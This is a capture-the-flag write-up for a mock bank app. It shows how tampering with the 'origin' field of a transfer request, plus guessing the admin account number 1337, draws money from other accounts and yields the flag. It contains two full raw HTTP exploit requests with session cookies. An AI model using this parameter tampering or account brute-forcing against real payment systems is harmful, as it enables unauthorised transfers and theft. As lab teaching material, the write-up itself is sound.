Tags: misc 

Rating:

### Our bank app is secure because we run vulnerability scanners, get a transfer from the admin account!
Link: http://bank.eko.cap.tf:50000/

After creating account and logging in, we can see three Tabs: Incoming payments, Outcoming Payments and Transfer tab.
After firing up Burp proxy and sending transaction to `Juan Escobar - 4242` we can see the following request:

![](https://i.ibb.co/PFkVzwH/Screenshot-from-2020-09-27-16-54-00.png)

```
POST /transfer HTTP/1.1
Host: bank.eko.cap.tf:50000
Content-Length: 121
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bank.eko.cap.tf:50000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bank.eko.cap.tf:50000/transfer
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6Inoxby9ZanVvQzgyb1FoMGRpcm83dGc9PSIsInZhbHVlIjoiVlJ6Z3dSbXFDVzl6cmpHQzJJL0VBcGdmcWU3U0ZjU0Q5SFBvL3hBLzN5M3NhcVRiZ3ZmU1YwNkU5YzBrQ0Z4RkN6akJ4Wk94V2VZVkJiREQrSHlRS0M2OTVYb1VLRHoyQVIwdm9mVmhRUFZzSkNEMXJLRG13RFpISlBldzN5RVoiLCJtYWMiOiIwMzA5M2JlNjZhOGQyYzE5NDY2NWViMTNjZDRkN2Q0ZDAzNzIwZGE3ODYxNmZiOGViNTU5Y2M0YzNjMWM5M2Q4In0%3D; null_bank_session=eyJpdiI6IklUTWM3OXRraFJ0MlZSLzh0TENrclE9PSIsInZhbHVlIjoiOUhzZzFCVFBnNTRiZ3Y3VlkzRDVuNlZPRTlYZ0VsWHlIcFVEOE9BMWtYRlFhQmZ1a0xmd0RuQVVOTnhlc1R6SHhYNER0RHBCWGNBdk1JZ3ovWnNtdUxKbkFSRmd6VklXVTJOSjk3QWxOUFNzUW5nZ1FzL2VKcllQUTF5S2tGY3UiLCJtYWMiOiI1ODNkMjBlZTg3Y2UwYzgyY2EyYTQzOGE5YzhmNDdiNWE0ODc0MzM2Y2U5ODQ1MDU4ZDc0MmJhZmU2ZGNiNzBjIn0%3D
Connection: close

_token=5L7xtRsvngrOx8y3AaIzNhOTkjnHpqLgsUR18Nv4&origin=5686&destination=4242&bank=Banco+PUG&name=Juan+Escobar&amount=1&message=a
```

![Sent Money](https://i.ibb.co/VVYxb28/Screenshot-from-2020-09-27-13-32-37.png)

Notice the `destination` and `origin`? With this authenticated request we can actually send money to us!

So lets try to repeat this request but switch origin and destination adresses, and voila! It works! We've received money from account 4242
![Received money](https://i.ibb.co/KbncCpC/Screenshot-from-2020-09-27-13-34-48.png)

Okay, so now we need to bruteforce the admin's account number.
I've tried to bruteforce admin in ID range `4000` - `6000`, given the existing account numbers, with no luck, then I completely randomly tried to send money from account number `1337` to my account and boom, I've received payment from admin with flag in the name - should've bruteforced from 0
```
POST /transfer HTTP/1.1
Host: bank.eko.cap.tf:50000
Content-Length: 121
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bank.eko.cap.tf:50000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bank.eko.cap.tf:50000/transfer
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6Inoxby9ZanVvQzgyb1FoMGRpcm83dGc9PSIsInZhbHVlIjoiVlJ6Z3dSbXFDVzl6cmpHQzJJL0VBcGdmcWU3U0ZjU0Q5SFBvL3hBLzN5M3NhcVRiZ3ZmU1YwNkU5YzBrQ0Z4RkN6akJ4Wk94V2VZVkJiREQrSHlRS0M2OTVYb1VLRHoyQVIwdm9mVmhRUFZzSkNEMXJLRG13RFpISlBldzN5RVoiLCJtYWMiOiIwMzA5M2JlNjZhOGQyYzE5NDY2NWViMTNjZDRkN2Q0ZDAzNzIwZGE3ODYxNmZiOGViNTU5Y2M0YzNjMWM5M2Q4In0%3D; null_bank_session=eyJpdiI6IklUTWM3OXRraFJ0MlZSLzh0TENrclE9PSIsInZhbHVlIjoiOUhzZzFCVFBnNTRiZ3Y3VlkzRDVuNlZPRTlYZ0VsWHlIcFVEOE9BMWtYRlFhQmZ1a0xmd0RuQVVOTnhlc1R6SHhYNER0RHBCWGNBdk1JZ3ovWnNtdUxKbkFSRmd6VklXVTJOSjk3QWxOUFNzUW5nZ1FzL2VKcllQUTF5S2tGY3UiLCJtYWMiOiI1ODNkMjBlZTg3Y2UwYzgyY2EyYTQzOGE5YzhmNDdiNWE0ODc0MzM2Y2U5ODQ1MDU4ZDc0MmJhZmU2ZGNiNzBjIn0%3D
Connection: close

_token=5L7xtRsvngrOx8y3AaIzNhOTkjnHpqLgsUR18Nv4&origin=1337&destination=4242&bank=Banco+PUG&name=admin&amount=1&message=a
```

![flag](https://i.ibb.co/0CNHSkG/Screenshot-from-2020-09-27-13-37-36.png)

Flag: EKO{fr33_m0ney_c4ptain!}